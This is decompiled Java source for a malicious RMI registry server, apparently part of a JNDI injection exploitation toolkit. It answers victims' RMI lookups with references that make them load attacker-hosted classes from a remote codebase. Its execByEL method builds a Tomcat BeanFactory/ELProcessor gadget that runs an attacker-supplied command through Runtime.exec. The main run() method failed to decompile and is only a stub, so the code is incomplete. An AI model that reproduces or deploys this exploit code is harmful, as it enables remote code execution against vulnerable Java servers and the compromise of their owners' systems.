/*
 * Decompiled with CFR 0.152.
 */
package jndi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLClassLoader;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObject;
import java.rmi.server.UID;
import java.util.Arrays;
import javassist.ClassClassPath;
import javassist.ClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javax.naming.RefAddr;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import org.apache.naming.ResourceRef;
import run.ServerStart;
import sun.rmi.server.UnicastServerRef;
import util.Mapper;
import util.Reflections;

public class RMIRefServer
implements Runnable {
    public String command;
    private int port;
    private ServerSocket ss;
    private Object waitLock = new Object();
    private boolean exit;
    private boolean hadConnection;
    private URL classpathUrl;

    public RMIRefServer(int port, URL classpathUrl) throws IOException {
        this.port = port;
        this.classpathUrl = classpathUrl;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    public RMIRefServer(int port, URL classpathUrl, String command) throws IOException {
        this.port = port;
        this.classpathUrl = classpathUrl;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
        this.command = command;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    public boolean waitFor(int i) {
        try {
            if (this.hadConnection) {
                return true;
            }
            System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Waiting for connection");
            Object object = this.waitLock;
            synchronized (object) {
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        }
        catch (InterruptedException e) {
            return false;
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    public void close() {
        this.exit = true;
        try {
            this.ss.close();
        }
        catch (IOException iOException) {
            // empty catch block
        }
        Object object = this.waitLock;
        synchronized (object) {
            this.waitLock.notify();
        }
    }

    public static final void main(String[] args) {
        int port = 1099;
        try {
            Class.forName("util.Mapper");
        }
        catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
        try {
            System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Opening JRMP listener on " + port);
            RMIRefServer c = new RMIRefServer(port, new URL("http://testlocal.com:8080/"));
            c.run();
        }
        catch (Exception e) {
            System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Listener error");
            e.printStackTrace(System.err);
        }
    }

    /*
     * Exception decompiling
     */
    @Override
    public void run() {
        /*
         * This method has failed to decompile.  When submitting a bug report, please provide this stack trace, and (if you hold appropriate legal rights) the relevant class file.
         * 
         * org.benf.cfr.reader.util.ConfusedCFRException: Tried to end blocks [6[TRYBLOCK]], but top level block is 17[CASE]
         *     at org.benf.cfr.reader.bytecode.analysis.opgraph.Op04StructuredStatement.processEndingBlocks(Op04StructuredStatement.java:435)
         *     at org.benf.cfr.reader.bytecode.analysis.opgraph.Op04StructuredStatement.buildNestedBlocks(Op04StructuredStatement.java:484)
         *     at org.benf.cfr.reader.bytecode.analysis.opgraph.Op03SimpleStatement.createInitialStructuredBlock(Op03SimpleStatement.java:736)
         *     at org.benf.cfr.reader.bytecode.CodeAnalyser.getAnalysisInner(CodeAnalyser.java:850)
         *     at org.benf.cfr.reader.bytecode.CodeAnalyser.getAnalysisOrWrapFail(CodeAnalyser.java:278)
         *     at org.benf.cfr.reader.bytecode.CodeAnalyser.getAnalysis(CodeAnalyser.java:201)
         *     at org.benf.cfr.reader.entities.attributes.AttributeCode.analyse(AttributeCode.java:94)
         *     at org.benf.cfr.reader.entities.Method.analyse(Method.java:531)
         *     at org.benf.cfr.reader.entities.ClassFile.analyseMid(ClassFile.java:1055)
         *     at org.benf.cfr.reader.entities.ClassFile.analyseTop(ClassFile.java:942)
         *     at org.benf.cfr.reader.Driver.doJarVersionTypes(Driver.java:257)
         *     at org.benf.cfr.reader.Driver.doJar(Driver.java:139)
         *     at org.benf.cfr.reader.CfrDriverImpl.analyse(CfrDriverImpl.java:76)
         *     at org.benf.cfr.reader.Main.main(Main.java:54)
         */
        throw new IllegalStateException("Decompilation failed");
    }

    private void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception {
        System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Reading message...");
        int op = in.read();
        switch (op) {
            case 80: {
                this.doCall(in, out);
                break;
            }
            case 82: {
                out.writeByte(83);
                break;
            }
            case 84: {
                UID.read(in);
                break;
            }
            default: {
                throw new IOException(ServerStart.getLocalTime() + " [RMISERVER]  >> unknown transport op " + op);
            }
        }
        s.close();
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void doCall(DataInputStream in, DataOutputStream out) throws Exception {
        ObjID read;
        ObjectInputStream ois = new ObjectInputStream(in){

            @Override
            protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.jndi.ObjID;".equals(desc.getName())) {
                    return ObjID[].class;
                }
                if ("java.rmi.jndi.ObjID".equals(desc.getName())) {
                    return ObjID.class;
                }
                if ("java.rmi.jndi.UID".equals(desc.getName())) {
                    return UID.class;
                }
                if ("java.lang.String".equals(desc.getName())) {
                    return String.class;
                }
                throw new IOException(ServerStart.getLocalTime() + " [RMISERVER]  >> Not allowed to read object");
            }
        };
        try {
            read = ObjID.read(ois);
        }
        catch (IOException e) {
            throw new MarshalException(ServerStart.getLocalTime() + " [RMISERVER]  >> unable to read objID", e);
        }
        if (read.hashCode() == 2) {
            RMIRefServer.handleDGC(ois);
        } else if (read.hashCode() == 0 && this.handleRMI(ois, out)) {
            this.hadConnection = true;
            Object object = this.waitLock;
            synchronized (object) {
                this.waitLock.notifyAll();
            }
            return;
        }
    }

    private boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Exception {
        int method = ois.readInt();
        ois.readLong();
        if (method != 2) {
            return false;
        }
        String object = (String)ois.readObject();
        System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Is RMI.lookup call for " + object + " " + method);
        String cpstring = this.classpathUrl.toString();
        String reference = Mapper.references.get(object);
        if (reference == null) {
            System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Reference that matches the name(" + object + ") is not found.");
            return false;
        }
        URL turl = new URL(cpstring + "#" + reference);
        out.writeByte(81);
        try (MarshalOutputStream oos = new MarshalOutputStream(out, turl);){
            oos.writeByte(1);
            new UID().write(oos);
            ReferenceWrapper rw = Reflections.createWithoutConstructor(ReferenceWrapper.class);
            if (reference.startsWith("Bypass")) {
                System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Sending local classloading reference.");
                Reflections.setFieldValue(rw, "wrappee", this.execByEL());
            } else {
                System.out.println(String.format(ServerStart.getLocalTime() + " [RMISERVER]  >> Sending remote classloading stub targeting %s", new URL(cpstring + reference.concat(".class"))));
                Reflections.setFieldValue(rw, "wrappee", new Reference("Foo", reference, turl.toString()));
            }
            Field refF = RemoteObject.class.getDeclaredField("ref");
            refF.setAccessible(true);
            refF.set(rw, new UnicastServerRef(12345));
            oos.writeObject(rw);
            oos.flush();
            out.flush();
        }
        return true;
    }

    public ResourceRef execByEL() {
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        ref.add((RefAddr)new StringRefAddr("forceString", "x=eval"));
        ref.add((RefAddr)new StringRefAddr("x", String.format("\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('%s')\")", this.command)));
        return ref;
    }

    private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.readInt();
        ois.readLong();
        System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
    }

    protected static Object makeDummyObject(String className) {
        try {
            ClassLoader isolation = new ClassLoader(){};
            ClassPool cp = new ClassPool();
            cp.insertClassPath((ClassPath)new ClassClassPath(Dummy.class));
            CtClass clazz = cp.get(Dummy.class.getName());
            clazz.setName(className);
            return clazz.toClass(isolation).newInstance();
        }
        catch (Exception e) {
            e.printStackTrace();
            return new byte[0];
        }
    }

    static final class MarshalOutputStream
    extends ObjectOutputStream {
        private URL sendUrl;

        public MarshalOutputStream(OutputStream out, URL u) throws IOException {
            super(out);
            this.sendUrl = u;
        }

        MarshalOutputStream(OutputStream out) throws IOException {
            super(out);
        }

        @Override
        protected void annotateClass(Class<?> cl) throws IOException {
            if (this.sendUrl != null) {
                this.writeObject(this.sendUrl.toString());
            } else if (!(cl.getClassLoader() instanceof URLClassLoader)) {
                this.writeObject(null);
            } else {
                URL[] us = ((URLClassLoader)cl.getClassLoader()).getURLs();
                String cb = "";
                for (URL u : us) {
                    cb = cb + u.toString();
                }
                this.writeObject(cb);
            }
        }

        @Override
        protected void annotateProxyClass(Class<?> cl) throws IOException {
            this.annotateClass(cl);
        }
    }

    public static class Dummy
    implements Serializable {
        private static final long serialVersionUID = 1L;
    }
}

